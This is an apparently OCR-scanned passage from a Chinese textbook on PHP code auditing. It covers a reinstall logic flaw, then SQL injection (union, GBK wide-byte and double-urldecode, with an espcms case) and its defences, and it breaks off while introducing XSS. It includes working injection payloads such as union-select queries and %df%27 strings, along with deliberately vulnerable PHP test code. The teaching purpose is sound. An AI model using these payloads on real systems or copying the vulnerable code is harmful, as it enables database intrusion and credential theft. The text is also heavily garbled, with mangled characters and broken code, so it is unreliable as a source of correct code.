ESPCMS 就 多 次 被 曝光 存在 这 个 漏洞 ， 具 体 的 漏洞 分 析 在 乌云 上 面 可 以 直接 看 到 ， 其 中 一 个 漏洞 信息 如 下 ， 感 兴趣 的 读者 可 以 研究 一 下 : 
缺陷 编号 : WooYun-2015-90324 
漏洞 标题 : ESPCMS 所 有 版 本 任意 用 户 登 录 
相关 厂商 : 易 思 ESPCMS 企 业 网 站 管理 系统 
漏洞 作者 : BAP 


4) 找 回 密码 功能 。 找 回 密码 虽然 看 起 来 不 像 任 意 文 件 上 传 这 种 可 以 危害 到 服务 器 安全 的 漏洞 ， 但 是 如 果 可 以 重 置 管理 员 的 密码 ， 也 是 可 以 间接 控制 业务 权限 甚至 拿 到 服务 器 权限 的 。 而 找 回 密码 功能 芯 
漏洞 有 很 多 利用 场景 ， 最 常见 的 是 验证 码 爆 破 ， 目 前 特别 是 APP 应 用 ， 请 求 后 端 验 证 码 的 时 候 大 多 是 4 人 位， 并 且 没 有 限制 验证 码 错 误 次 数 和 有 效 时 间 ， 于 是 就 出 现 了 爆破 的 漏洞 。 除 此 之 外 ， 还 有 验证 凭证 的 
算法 ， 这 需要 在 代码 中 才能 看 到 ， 所 以 我 们 做 代码 审计 的 时 候 可 以 看 看 这 个 算法 是 否 可 信 。 


这 些 功能 点 上 的 漏洞 需要 我 们 多 读 代码 才能 积累 经 验 。 


BugFree 重 装 漏洞 案例 


针对 功能 点 的 审计 是 相对 简单 的 ， 不 过 在 使 用 这 种 方式 审计 之 前 建议 先 了 解 整个 程序 的 架构 设计 和 运行 流程 ， 程 序 重 装 漏洞 在 早期 是 比较 常见 的 ， 我 们 来 看 看 BugFree 的 程序 安装 功能 ， 该 程序 之 前 被 
papaver 爆 出 存在 多 个 漏洞 ， 其 中 就 有 一 个 重 装 漏洞 。 


BugFree 安 装 文件 在 instalNindex.php， 代 码 如 下 : 


«? php 

require once ('func.inc.php') ; 

set time limit (0) ; 

error reporting (E ERROR) ; 

// 基本 路 径 

define ('BASEPATH', realpath (dirname (dirname ( FILE )))); 

// upload path 

define ('UPLOADPATH', realpath (dirname (dirname (dirname ( FILE ) ) ) ) .DIRECTORY SEPARATOR. 'BugFile') ; 
// 配置 样本 文件 路 径 

define ('CONFIG SAMPLE FILE', BASEPATH . '/protected/config/main.sample.php') ; 

// 配置 文件 路 径 
define ('CONFIG FILE', BASEPATH . '/protected/config/main.php') ; 





























AXE BA S'func.inc.php' f+, PREX SICA Lea, TES E STXDRLUSBEOS ERE SI REA SN, RMSE MACE AEE, "RARE NIE, AEH TEREA 
程 的 地 方 如 下 代码 所 示 : 

















$action = isset ($ REQUEST['action']) ? $ REQUEST['action'] : CHECK; 
if (is file ("install.lock") && Saction ! = UPGRADED && Saction ! = INSTALLED) 

















header ("location: http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../index.php") ; 


这 段 代码 存在 一 个 逻辑 漏洞 ， 首 先 判断 install.lock 文 件 是 否 存 在 以 及 action 参 数值 是 否 升级 完成 和 安装 完成 ， 如 果 是 ， 则 跳 转 到 程序 首页 ， 这 里 仪 仅 使 用 了 


header ("location: http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../index.php") ; 


并 没有 使 用 die () 或 者 exit () 等 函数 退出 程序 流程 ， 这 个 跳 转 只 是 HTTP 头 的 跳 转 ， 下 方 代 码 依然 会 继续 执行 ， 这 时 候 如 果 使 用 浏览 器 请 求 instalVindex.php 文 件 则 会 跳 转 到 首页 ， 我 们 用 burp 试 试 ， 效 
果 如 图 3-13 所 示 。 
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图 3-13 


可 以 看 到 程序 又 可 以 再 次 安装 。 


第 4 章 ime (基础 篇 ) 


每 类 漏洞 都 有 针对 性 的 审计 技巧 ， 在 我 们 掌握 了 这 些 技巧 之 后 ， 就 可 以 有 针对 性 地 挖掘 我 们 想 要 的 漏洞 。 漏 洞 大 致 分 为 SQL 注入 、XsSs、 文 件 操作 、 代 码 /命令 执行 、 变 量 覆 盖 以 及 逻辑 处 理 ， 等 等 ， 
些 都 是 常见 的 Web 漏 洞 。 


本 章 作 为 基础 篇 ， 只 介绍 最 常见 的 SQL 注入 、XSs、CSRF 漏 洞 ， 分 析 其 原理 、 利 用 方式 ， 并 介绍 防范 策略 。 


41 SQL 注入 漏洞 
SQL 注入 漏洞 可 能 是 被 人 知道 最 多 的 漏洞 ， 哪 怕 再 没有 接触 到 安全 的 程序 员 ， 多 多 少 少 会 对 这 个 词 有 所 耳闻 ， 它 也 是 目前 被 利用 得 最 多 的 漏洞 。 根 据 笔者 维护 公司 waf 时 统计 的 数据 ， 它 的 攻击 次 数 占 总 
攻击 拦截 的 一 半 以 上 。SsQL 注 入 漏洞 的 原理 非常 简单 ， 由 于 开发 者 在 编写 操作 数据 库 代 码 时 ， 直 接 将 外 部 可 控 的 参数 拼接 到 SQL 语句 中 ， 没 有 经 过 任何 过 滤 就 直接 放 入 数据 库 引 警 执行 


由 于 SQL 注 入 是 直接 面 对 数 据 库 进行 攻击 的 ， 所 以 它 的 危害 不 言 而 喻 ， 通 常 利用 SQL 注 入 的 攻击 方式 有 下 面 几 种 : 一 是 在 权限 较 大 的 情况 下 ， 通 过 SQL 注入 可 以 直接 写 入 webshell， 或 者 直接 执行 系统 
命令 等 。 二 是 在 权限 较 小 的 情况 下 ， 也 可 以 通过 注入 来 获得 管理 员 的 密码 等 信息 ， 或 者 修改 数据 库 内 容 进行 一 些 钓鱼 或 者 其 他 间接 利用 。 


针对 SQL 注入 漏洞 的 利用 工具 也 是 越 来 越 智能 ，sqlmap 是 目前 被 使 用 最 多 的 注入 工具 ， 这 是 一 款 国 外 开源 的 跨 平台 SQL 注入 工具 ， 用 Python 开发 ， 支 持 多 种 方式 以 及 几乎 所 有 类 型 的 数据 库 注 入 ， 对 
SQL 注 入 漏洞 的 兼容 性 也 非常 强 。 


既然 SQL 注入 是 被 利用 最 多 的 漏洞 ， 因 此 它 也 是 被 研究 最 深 的 漏洞 ， 针 对 不 同 的 漏洞 代码 情况 和 运行 环境 ， 有 多 种 的 利用 方式 ， 如 普通 注入 、 盲 注 、 报 错 注 入 、 宽 字 节 注 入 、 二 次 注入 等 ， 但 是 它们 的 
原理 都 是 大 同 小 异 的 ， 下 面 笔者 会 介绍 怎么 挖 气 到 这 些 注入 漏洞 。 
4.1.1. 挖掘 经 验 


SQL 注入 经 常 出 现在 登录 页 面 、 获 取 HTTP 头 (user-agent/client-ip 等 ) 、 订 单 处 理 等 地 方 ， 因 为 这 几 个 地 方 是 业务 相对 复杂 的 ， 登 录 页 面 的 注入 现在 来 说 大 多 是 发 生 在 HTTP 头 里 面 的 client-ip 和 x- 
forward-for， 一 般 用 来 记录 登录 的 |P 地 址 ， 另 外 在 订单 系统 里 面 ， 由 于 订单 涉及 购物 车 等 多 个 交互 ， 所 以 经 常会 发 生 二 次 注入 。 我 们 在 通读 代码 挖掘 漏洞 的 时 候 可 以 着 重 天 注 这 几 个 地 方 。 


4.1.1.1. 普通 注入 


这 里 说 的 普通 注入 是 指 最 容易 利用 的 SQL 注 入 漏洞 ， 比 如 直接 通过 注入 union 查 询 就 可 以 查询 数据 库 ， 一 般 的 SQL 注 入 工具 也 能 够 非常 好 地 利用 。 普 通 注 入 有 int 型 和 string 型 ， 在 string 型 注入 中 需要 使 
用 单 或 双 引 号 闭合 ， 下 面 简单 演示 普通 注入 漏洞 ， 后 面 所 有 测试 SQL 注入 漏洞 的 数据 表 中 数据 都 如 图 4-1 所 示 。 








— = = 


userinfo @test (localhost) - ... 



































mt- Yi bum 

username pas ywo rd email 
1 admin 123456 testi? mail.com 
2 admini 654321 test1@mail.com 





测试 代码 如 下 : 


«? php 

Suid=$ GET['id']; 

Ssql="SELECT * FROM userinfo where id=Suid"; 
$conn-mysql connect ('localhost', 'root', '123456') ; 
mysql select db ("test", $conn) ; 

$resultemysql query ($sql, $conn) ; 

print r (5 当前 SQL 语句: '.S$sql.'«br /> 结果 : ') ; 


print r (mysql fetch row ($result) ) ; 
































测试 代码 中 GET id 参数 存在 SQL 注入 漏洞 ， 测 试 方法 如 图 4-2 所 示 。 


4) Load URL  http;//localhost/phpsafe/5.1.2.1/1.php?id--1 union select 1,user(),2,4 
Ü  SplitURL 
+) Execute 

Enable Post data Enable Referrer 


3iBjsQLi&): SELECT * FROM userinfo where id--1 union select 1, user(), 3,4 
i: Array ( [0] => 1 [1] => root@localhost [2] => 3 [3] => 4) 





从 截图 可 以 看 到 原本 的 SQL 语句 已 被 注入 更 改 ， 使 用 了 union 查 询 到 当前 用 户 。 

从 上 面 的 测试 代码 中 可 以 发 现 ， 数 据 库 操作 存在 一 些 关 键 字 ， 比 如 select from、mysql_connect、mysql_query、mysql_fetch_row 等 ， 数 据 库 的 查询 方式 还 有 update、insert、delete， 我 们 在 做 白 
盒 审计 时 ， 只 需要 查找 这 些 关 键 字 ， 即 可 定向 挖掘 SQL 注入 漏洞 。 
4.1.1.2 ”编码 注入 


程序 在 进行 一 些 操作 之 前 经 常会 进行 一 些 编码 处 理 ， 而 做 编码 处 理 的 函数 也 是 存在 问题 的 ， 通 过 输入 转 码 函数 不 兼容 的 特殊 字符 ， 可 以 导致 输出 的 字符 变 成 有 害 数据 ， 在 SQL 注入 里 ， 最 常见 的 编码 注 


是 MySQL 宽 字 节 以 及 urldecode/rawurldecode 函 数 导致 的 。 
1. 宽 字 节 注入 


在 使 用 PHP 连 接 MySQL 的 时 候 ， 当 设置 “set character_set_client=gbk” 时 会 导致 一 个 编码 转换 的 注入 问题 ， 也 就 是 我 们 所 熟悉 的 宽 字 节 注入 ， 当 存在 宽 字 节 注 入 漏洞 时 ， 注 入 参数 里 带 


入 %df%27， 即 可 把 程序 中 过 滤 的 \(%5c) 吃 掉 。 举 个 例子 ,假设 /1.php? id=1 里 面 的 id 参数 存在 宽 字 节 注 入 漏洞 ， 当 提交 /1.php? id--1' and 1=1%23 时 ，MySQL 运 行 的 SQL 语 句 为 select*from user 
where id=’ 1V and 1-17 很 明显 这 是 没有 注入 成 功 的 ,我们 提交 的 单 引号 被 转 义 导致 没有 闭合 前 面 的 单 引 号 ， 但 是 我 们 提交 /1.php? id=-1%df and 1=1%23 时 ， 这 时 候 MySQL 运 行 的 SQL 语句 为 : 


select * from user where id-'1i$£' and 1=1#' 











这 是 由 于 单 引 号 被 自动 转 义 成 \， 前 面 的 %df 和 转 义 字符 \ 反 斜 杠 (%5c) 组 合成 了 %df%5c， 也 就 是 “还 ” 字 ， 这 时 候 单 引 号 依然 还 在 ， 于 是 成 功 闭合 了 前 面 的 单 引号 。 
出 现 这 个 漏洞 的 原因 是 在 PHP 连 接 MySQL 的 时 候 执 行 了 如 下 设置 : 


set character set client-gbk 





告诉 MySQL 服 务 器 客户 端 来 源 数据 编码 是 GBK， 然 后 MySQL 服 务 器 对 查询 语句 进行 GBK 转 码 导致 反 斜 杠 \ 被 %df 吃 掉 ， 而 一 般 都 不 是 直接 设置 character_set_client=gbk， 通 常 的 设置 方法 是 SET 


NAMES'gbk', (HESESET NAMES'gbk' 不 过 是 比 character set client=gbk 多 干 了 两 件 事 而 已 ，SET NAMES'gbk' 等 同 于 如 下 代码 : 





SET 
character set connection-'gbk', 
character set results-'gbk', 


character set client-gbk 





























这 同样 也 是 存在 漏洞 的 ， 另 外 官方 建议 使 用 mysql_set_charset 方 式 来 设置 编码 ， 不 幸 的 是 它 也 只 是 调用 了 SET NAMES， 所 以 效果 也 是 一 样 的 。 不 过 mysql_set_charset 调 用 SET NAMES 之 后 还 记录 了 
当前 的 编码 ， 留 着 给 后 面 mysql_real escape _string 处 理 字 符 串 的 时 候 使 用 ， 所 以 在 后 面 只 要 合理 地 使 用 mysql real escape_string 还 是 可 以 解决 这 个 漏洞 的 ， 关 于 这 个 漏洞 的 解决 方法 推荐 如 下 几 种 方法 : 


1) 在 执行 查询 之 前 先 执行 SET NAMES'gbk', character set clientzbinaryi&character set client 为 binary。 


2) 使 用 mysdl_ set charset ('gbk') 设置 编码 ， 然 后 使 用 mysql_ real escape string () Mawes; 
3) 使 用 pdo 方 式 ， 在 PHP5.3.6 及 以 下 版 本 需要 设置 setAttribute (PDO: : ATTR EMULATE PREPARES, false) ; 来 禁用 prepared statements 的 仿真 效果 。 
如 上 几 种 方法 更 推荐 第 一 和 第 三 种 。 


下 面 对 宽 字 节 注入 进行 一 个 简单 测试 。 











测算 代码 如 下 : 

«? php 

Sconn=mysql connect ('localhost', 'root', '123456') ; 
mysql select db ("test", $conn) ; 

mysql query ("SET NAMES 'gbk'", Sconn) ; 


$uid-addslashes ($ GET['id']) ; 








Ssql="SELECT * FROM userinfo where id='Suid'"; 
Sresult=mysql query ($sql, $conn) ; 
print (7 当前 SOLD 语 多: '.Seql,'<br /> 结果 : ') 3 


print r (mysql fetch row ($result) ) ; 
mysql close () ; 




















当 提 交 /1.php? id=%df'union select 1，2，3，49%23 时 ， 成 功 注入 的 效果 如 图 4-3 所 示 。 


mr >| = @ SOL- XSS- Encryption- Encoding- Other- 








U Split URL 


+) Execute 


Enable Post data Enable Referrer 


4 B/SQLi2G): SELECT * FROM userinfo where id= j$' union select 1, 2,3, 4# 
结果 ; Array ( [0] = 1 [1] => 2 [2] > 3 [3] > 4) 
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对 宽 字 节 注 入 的 挖掘 方法 也 比较 简单 ， 只 要 搜索 如 下 几 个 关键 字 即 可 : 





SET NAMES 
character set client-gbk 
mysql set charset ('gbk') 

















2. 二 次 urldecode 注 入 


只 要 字符 被 进行 转换 就 有 可 能 产生 漏洞 ， 现 在 的 Web 程 序 大 多 都 会 进行 参数 过 滤 ， 通 常 使 用 addslashes () 、mysql_real_escape string () . mysql escape string () 函数 或 者 开启 GPC 的 方式 来 
防止 注入 ， 也 就 是 给 单 引号 (') 、 双 引号 (") 、 反 和 斜 杠 (\) 和 NULL 加 上 反 和 斜 杠 转 义 。 如 果 某 处 使 用 了 urldecode 或 者 rawurldecode 函 数 ， 则 会 导致 二 次 解码 生成 单 引号 而 引发 注入 。 原 理 是 我 们 提交 参 
数 到 WebServer 时 ，WebServer 会 自动 解码 一 次 ,假设 目标 程序 开启 了 GPC， 我 们 提交 /1.php? id=1%2527， 因 为 我 们 提交 的 参数 里 面 没有 单 引 号 ， 所 以 第 一 次 解码 后 的 结果 是 id=1%27，%25 解 码 的 结 
果 是 %， 如 果 程 序 里 面 使 用 了 urldecode 或 者 rawurldecode 函 数 来 解码 id 参数 ， 则 解码 后 的 结果 是 id=1” 单 引号 成 功 出现 引 发 注入 。 


测试 代码 : 





«? ph 

Sa=addslashes ($ GET['p']) ; 
Sb-urldecode ($a) ; 

echo 'Sa='.Sa; 

echo '«br /»'; 

echo 'Sb='.Sb; 





测试 效果 如 图 4-4 所 示 。 


= @ SQL- XSS- Encryption: Encoding Other- 
w Load URL | http://localhost/phpsafe/test/1.php?p- 1962527 
Ü Split URL 


+) Execute 


Enable Post data Enable Referrer 


$a=1%27 
$b=1 
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既然 知道 了 原理 主要 是 由 于 urldecode 使 用 不 当 导致 的 ， 那 我 们 就 可 以 通过 搜索 urldecode 和 rawurldecode 函 数 来 挖掘 二 次 urldecode 注 入 漏洞 。 
4.1.1.3 espcms 搜 索 注 入 分 析 
这 里 以 一 个 笔者 在 2013 年 发 现 的 一 个 小 CM 程序 espcms 搜 索 注入 的 漏洞 为 例 ， 我 们 目前 尽量 以 相对 好 理解 的 漏洞 来 举例 。 
漏洞 在 interface/search.php 文 件 和 interface/3gwap_search.php 文 件 in taglist () 函数 都 存在 ， 一 样 的 问题 ， 以 interface/search.php 为 例 说 明 : 


打开 文件 看 到 如 下 代码 : 











function in taglist () { 
parent: : start pagetemplate (7 3 
include once admin ROOT . 'public/class pagebotton.php'; 
















































































Spage = Sthis->fun->accept ('page', 'G') ; 
Spage = isset ($page) ? intval ($page) : 1; 
$lng = (admin LNG == 'big5') ? S$this->CON['is lancode'] : admin LNG; 
Stagkey = urldecode (Sthis->fun->accept ('tagkey', 'R') ) ; 
Stakey = S$this-»fun-»inputcodetrim ($tagkey) ; 
$db where = ' WHERE Ing=\'' . $lng . '\' AND isclass=1'; 
if (empty ($tagkey) ) { 
SlinkURL = $ SERVER['HTTP REFERER']; 
Sthis-»callmessage ($this->lng['search err'], $linkURL, S$this->lng ['gobackbotton']) ; 
} 
if (! empty ($tagkey) ) { 
$db where.-" AND FIND IN SET ('Stagkey', tags) "; 
} 
其 中 : 
Stagkey = urldecode (Sthis->fun->accept ('tagkey', 'R') ) ; 





这 行 代码 得 到 $_REQUEST['tagkey'] 的 值 ， 由 于 $tagkey 变 量 使 用 了 urldecode， 从 而 可 以 绕 过 GPC: 





$db where.-" AND FIND IN SET ('Stagkey', tags) "; 














经 过 判断 $tagkey 不 为 空 则 拼接 到 SQL 语句 中 ， 导 致 产生 注入 漏洞 。 


4.1.2 ”漏洞 防范 


SQL 注 入 漏洞 虽然 是 目前 最 泛滥 的 漏洞 ， 不 过 要 解决 SQL 注 入 漏洞 其 实 还 比较 简单 。 在 PHP 中 可 以 利用 魔术 引号 来 解决 ， 不 过 魔术 引号 在 PHP 5.4 后 被 取消 ， 并 且 gpc 在 遇 到 int 型 的 注入 时 也 会 显得 不 那 
么 给 力 了 ， 所 以 通常 用 得 多 的 还 是 过 滤 溯 数 和 类 ， 像 discuz、dedecms、phpcms 等 程序 里 面 都 使 用 过 渡 类 ， 不 过 如 果 单 纯 的 过 滤 函 数 写 得 不 够 严谨 ， 也 会 出 现 绕 过 的 情况 ， 像 这 三 套 程 序 就 都 存在 绕 过 问 
题 。 当 然 最 好 的 解决 方案 还 是 利用 预 编译 的 方式 ， 下 面 就 来 看 看 这 三 种 方式 的 使 用 方法 。 


4.1.2.1 gpc/rutime 魔 术 引 号 


通常 数据 污染 有 两 种 方式 ， 一 种 是 应 用 被 动 接 收 参 数 ， 类 似 于 GET、POST 等 ;还 有 一 种 是 主动 获取 参数 ， 类 似 于 读 取 远程 页 面 或 者 文件 内 容 等 。 所 以 防止 SQL 注 入 的 方法 就 是 要 守住 这 两 条 路 。 在 本 书 
第 2 章 第 3 节 介绍 了 PHP 的 核心 配置 ， 里 面 详细 介绍 了 GPC 等 魔术 引号 配置 的 方法 ，magic_quotes_gpc 负 责 对 GET、POST、COOKIE 的 值 进行 过 滤 ，magic_quotes_runtime 对 从 数据 库 或 者 文件 中 获取 的 
数据 进行 过 滤 。 通 常 在 开启 这 两 个 选项 之 后 能 防 住 部 分 SQL 注入 漏洞 被 利用 。 为 什么 说 是 部 分 ， 因 为 我 们 之 前 也 介绍 了 ， 它 们 只 对 单 引 号 () 、 双 引号 C) . RRL (\) 及 空 字符 NULL 进 行 过 滤 ， 在 int 
型 的 注入 上 是 没有 多 大 作用 的 。 


PHP 4.2.3 以 及 之 前 的 版 本 可 以 在 任何 地 方 设置 开启 ， 即 配置 文件 和 代码 中 ， 之 后 的 版 本 可 以 在 php.ini、httpd.conf 以 及 .htaccess 中 开启 。 
4.1.2.2 “过滤 函数 和 类 


过 滤 函 数 和 类 有 两 种 使 用 场景 ， 一 种 是 程序 入 口 统一 过 滤 ， 像 框架 程序 用 这 种 方式 比较 多 ， 另 外 一 种 是 在 程序 进行 SQL 语句 运行 之 前 使 用 ， 除 了 PHP 内 置 的 一 些 过 滤 单 引号 等 函数 外 ， 还 有 一 些 开 源 类 
过 滤 union、select 等 关键 字 。 


1.addslashes 函 数 


addslashes 函 数 过 滤 的 值 范围 和 GPC 是 一 样 的， 即 单 引号 () 、 双 引号 (O). RRL A) 及 空 字符 NULL， 它 只 是 一 个 简单 的 检查 参数 的 函数 ， 大 多 数 程序 使 用 它 是 在 程序 的 入 口 ， 进 行 判断 如 果 没 
有 开启 GPC， 则 使 用 它 对 $_POST/$_GET 等 变量 进行 过 滤 ， 不 过 它 的 参数 必须 是 string 类 型 ， 所 以 曾经 某 些 程序 使 用 这 种 方式 对 输入 进行 过 滤 时 出 现 了 绕 过 ， 比 如 只 遍历 $_GET 的 值 ， 当 时 并 没有 考虑 到 
$_GET 的 值 也 是 一 个 数组 。 我 们 来 看 一 个 例子 如 下 : 

<? php 


$str? =? "phpsafe' 
echo? addslashes ee 





上 面 的 例子 输出 : phpsafe\ 。 
2.mysql [real Jescape _string 国 数 


mysql_escape_string 和 mysql_real_escape_string 函 数 都 是 对 字符 串 进行 过 滤 ， 在 PHP4.0.3 以 上 版 本 才 存在 ， 如 下 字符 受 影响 【\x00】 [Nn] A] [X [1 C 【x1a】， 两 个 国 数 唯一 不 一 样 的 
地 方 在 于 mysql_ real escape _string 接 受 的 是 一 个 连接 句柄 并 根据 当前 字符 集 转 义 字符 串 ， 所 以 推荐 使 用 mysql_real escape string. 

















使 用 举例 : 

«? php 

$con = mysql connect ("localhost", "root", "123456") ; 
Sid = mysql real escape string ($ GET['id'], $con) ; 
Ssql="select * from test where id-'".S$id."'"; 

echo $sql; 





当 请 求 该 文件 ? id=1 时 ， 上 面 代 码 输 出 : select*from test where id='1\"' 
3.intval 等 字符 转换 


上 面 我 们 提 到 的 过 滤 方式 ， 在 int 类 型 注入 时 效果 并 不 好 ， 比 如 可 以 通过 报错 或 者 盲 注 等 方式 来 绕 过 ， 这 时 候 intval 等 函数 就 起 作用 了 ，intval 的 作用 是 将 变量 转换 成 int 类 型 ， 这 里 举例 intval 是 要 表达 一 
种 方式 ， 一 种 利用 参数 类 型 白 名 单 的 方式 来 防止 漏洞 ， 对 应 的 还 有 很 多 如 floatval 等 ， 


应 用 举例 如 下 : 


<? php 
Sid=intval ("1 union select ") ; 
echo $id; 





以 上 代码 输出 : 1 
4.1.2.3 PDO prepare 预 编译 


如 果 之 前 了 解 过 .NET 的 SqlParameter 或 者 java 里 面 的 prepareStatement， 那 么 就 很 容易 能 够 理解 PHP pdo 的 prepare， 它 们 三 个 的 作用 是 一 样 的 ， 都 是 通过 预 编 译 的 方式 来 处 理 数 据 库 查询 。 
我 们 先 来 看 一 段 代码 : 


<? php 

dbh = new PDO ("mysql: host=localhost; dbname=demo", "user", "pass") ; 
Sdbh-»exec ("set names 'gbk'") ; 

Ssql="select * from test where name = ? and password = ? " 

Sstmt = Sdbh-»prepare ($sql) ; 

Sexeres = $stmt-»execute (array ($name, Spass) ) ; 














上 面 这 段 代 码 虽 然 使 用 了 pdo 的 prepare 方 式 来 处 理 sql 查 询 ， 但 是 当 PHP 版 本 <5.3.6 之 前 还 是 存在 宽 字 节 SQL 注 入 漏洞 ， 原 因 在 于 这 样 的 查询 方式 是 使 用 了 PHP 本 地 模拟 prepare， 再 把 完整 的 SQL 语句 
发 送 绘 MySQL 服务器， 并且 有 使 用 set names'gbk' 语 句 ， 所 以 会 有 PHP 和 MySQL 编 码 不 一 致 的 原因 导致 SQL 注入 ， 正 确 的 写法 应 该 是 使 用 ATTR_EMULATE_PREPARES 来 禁用 PHP 本 地 模拟 prepare， 代 码 
如 下 : 


<? php 

dbh = new PDO ("mysql: host-localhost; dbname=demo", "user", "pass") ; 
$dbh-»setAttribute (PDO: : ATTR EMULATE PREPARES, false) ; 

$dbh-»exec ("set names 'utf8'") ; 

Ssql="select * from test wher nam =? and password = ? " 

Sstmt = S$dbh-»prepare ($sql) ; 
Sexeres = $stmt-»execute (array ($name, Spass) ) ; 















































4.2 XSSifesilr] 


XSs 学 名 为 跨 站 脚本 攻击 (Cross Site Scriptings) ， 在 Web 漏 洞 中 XSs 是 出 现 最 多 的 漏洞 ， 没 有 之 一 。 这 种 漏洞 有 两 种 情况 ， 一 种 是 通过 外 部 输入 然后 直接 在 浏览 器 端 触发 ， 即 反射 型 XSS; 还 有 一 种 
则 是 先 把 利用 代码 保存 在 数据 库 或 文件 中 ， 当 Web 程 序 读 取 利用 代码 并 输出 在 页 面 上 时 触发 漏洞 ， 也 就 是 存储 型 XSS$。XSS 攻 击 在 浏览 器 端 触 友 ， 大 家 对 其 危害 认识 往往 停留 在 可 以 窃取 cookie、 修 改 页 面 
钓鱼 ， 等 等 。 用 一 句 话 来 说 明 该 漏洞 的 危害 就 是 : 前 端 页 面 能 做 的 事 它 都 能 做 。 


4.2.1 挖掘 经 验 


挖掘 XSs 漏 洞 的 关键 在 于 寻找 没有 被 过 滤 的 参数 ， 且 这 些 参数 传 入 到 输出 函数 ， 常 用 的 输出 函数 列表 如 下 : print, printr, echo, printf, sprintf, die, var dump、var_export， 所 以 我 们 只 要 寻找 
带 有 变量 的 这 些 函 数 即 可 。 另 外 在 代码 审计 中 ，XSs 漏 洞 在 浏览 器 环境 对 利用 的 影响 非常 大 ， 所 以 最 重要 的 还 要 掌握 各 种 浏览 器 容错 、 编 码 等 特性 和 数据 协议 。 关 于 XSsS 漏 洞 的 东西 可 以 再 写 一 本 厚 厚 的 书 ， 
由 于 篇 幅 问题 ， 这 些 东 西 就 不 在 这 里 详细 介绍 了 ， 推 荐 阅读 抒 永 华 的 《XSs 跨 站 脚本 攻击 剖析 与 防御 》 和 余弦 的 《Web 前 端 黑客 技术 揭秘 》。 


XSs 漏 洞 比 SQL 注 入 更 多 ， 而 且 在 满足 业务 需求 的 情况 下 更 加 难 防 御 。X9Ss 漏 洞 经 常 出 现在 文章 发 表 、 评 论 回复 、 留 言 以 及 资料 设置 等 地 方 ， 特 别 是 在 发 文章 的 时 候 ， 因 为 这 里 大 多 都 是 富 文 本 ， 有 各 种 
图 片 引 用 、 文 字 格 式 设置 等 ， 所 以 经 常 出 现 对 标签 事件 过 滤 不 严格 导致 的 Xx3939， 同 样 ， 评 论 回复 以 及 留言 也 是 。 其 次 在 资料 设置 的 地 方 ， 比 如 用 户 昵称 、 签 名 等 ， 有 的 应 用 可 能 不 只 一 处 设置 资料 的 地 方 ， 
像 在 注册 的 地 方 可 以 设置 、 修 改 资料 的 地 方 可 以 设置 ， 这 时 候 要 多 留意 ， 不 一 定 所 有 设置 这 个 资料 的 地 方 都 过 滤 严 格 了 。 我 们 在 通读 代码 挖掘 的 时 候 可 以 重点 关注 这 几 个 地 方 ， 这 几 个 地 方 的 XSs 也 通常 都 
是 存储 型 的 。 


4.2.1.1 反射 型 XSS 


反射 型 XSS 也 就 是 我 们 在 描述 里 面 说 直接 通过 外 部 输入 然后 在 浏览 器 端 输 出 触发 的 类 型 ， 这 种 类 型 的 漏洞 比较 容易 通过 扫描 器 黑 盒 直接 发 现 ， 只 需要 将 尖 括 号 、 单 双 引 号 等 提交 到 Web 服 务 器 ， 检 查 返 
回 的 HTML 页 面 里 面 有 没有 保留 原来 的 特殊 字符 即 可 判断 。 但 是 


盒 审计 中 ， 我 们 只 需要 寻找 带 有 参数 的 输出 函数 ， 然 后 根据 输出 函数 对 输出 内 容 回溯 输入 参数 ， 观 察 有 没有 经 过 过 滤 。 
举例 一 个 反射 型 XSS 漏 洞 的 大 致 形式 ， 代 码 如 下 : 


// 以 下 是 QQ 私密 接口 

if (S GET["openid"]) ( 
// 授 权 成 功 后 ， 会 返回 用 户 的 openid 
// 检 查 返 回 的 openid 是 否 是 合法 id 
//echo $ G 
ll 











ET["oauth signature"]; 


(! is valid openid ($ GET["openid"], $ Gl 











ET["timestamp"], $ GET["oauth signature"]) ) 


( showerr ('API 帐 号 有 误 ! ') ; 





//demo 对 错误 简单 处 理 echo "###im 





代码 中 echo"sig: ".$ GET['oauth signature"]."\n"; 直接 将 $ GET["oauth_signature"] 的 值 输出 到 浏览 器 中 ， 则 可 以 直接 用 GET 方 式 注入 代码 。 


424.2 存储 型 XSS 


存储 型 XSS9， 顾 名 思 义 也 就 是 需要 先 把 利用 代码 保存 在 比如 数据 库 或 文件 中 ， 当 Web 程 序 读 取 利 用 代码 并 输出 在 页 面 上 时 执行 利用 代码 ， 它 的 原理 图 流程 图 如 图 4-5 所 示 。 


应 用 存储 代码 


受害 者 中 招 ele 





图 4-5 


人 存储 型 XSs 比 反射 型 要 容易 利用 得 多 ， 不 用 考虑 绕 过 浏览 器 的 过 滤 ， 另 外 在 隐蔽 性 上 面 也 要 好 得 多 ， 特 别 是 在 社交 网 络 中 的 存储 型 XSS 蠕 虫 能 造成 大 面积 的 传播 ， 影 响 非常 大 ， 曾 经 在 新 浪 微 博 和 百度 贴 
吧 都 爆发 过 大 规模 的 XSS 蠕 虫 。 


同样 ， 要 挖掘 存储 型 XSs 也 是 要 寻找 未 过 滤 的 输入 点 和 未 过 滤 的 输出 函数 ， 这 个 最 终 的 输出 点 可 能 跟 输入 点 完全 不 在 一 个 业务 流 上 ， 对 于 这 类 可 以 根据 当前 代码 功能 去 猜 ， 或 者 老 老实 实 去 追 哪里 有 操 
作 过 这 个 数据 ， 使 用 表 名 、 字 段 名 去 代码 里 面 搜索 。 


下 面 的 经 典 案例 分 析 将 讲述 一 个 存储 型 XSs 的 挖掘 过 程 。 











4.2.1.3 ”骑士 cms 存 储 型 XSS 分 析 





这 里 笔者 临时 找 了 一 个 叫 骑士 cms 的 程序 看 了 下 ， 在 后 台 申 请 友情 链接 的 地 方 存在 XSS 漏 洞 ， 常 规 的 特殊 字符 (如 尖 括 号 ) 和 标签 的 事件 (如 onerror 等 ) 大 多 被 过 滤 ， 漏 洞 挖掘 过 程 如 下 。 
安装 好 骑士 cms 后 ， 在 后 台 看 到 一 个 友情 链接 管理 如 图 4-6 所 示 。 


ed SOL XSS- Encryption Encoding» Other- 
x9 LoadURL http://localhost/74cms/admin/admin_link.php 
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LU Execute 
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前 台 有 一 个 申请 友情 链接 ， 根 据 经 验 这 个 申请 友情 链接 的 地 方 应 该 是 一 个 payload 输 入 的 地 方 ， 我 们 先 看 看 /admin/admin_link.php 的 代码 : 














Sact = ! empty ($ GET['act']) ? trim ($ GET['act']) : '‘'list'; 

Ssmarty—>assign ('pageheader', "友情 链接 ") ; 

if ($act == 'list') 

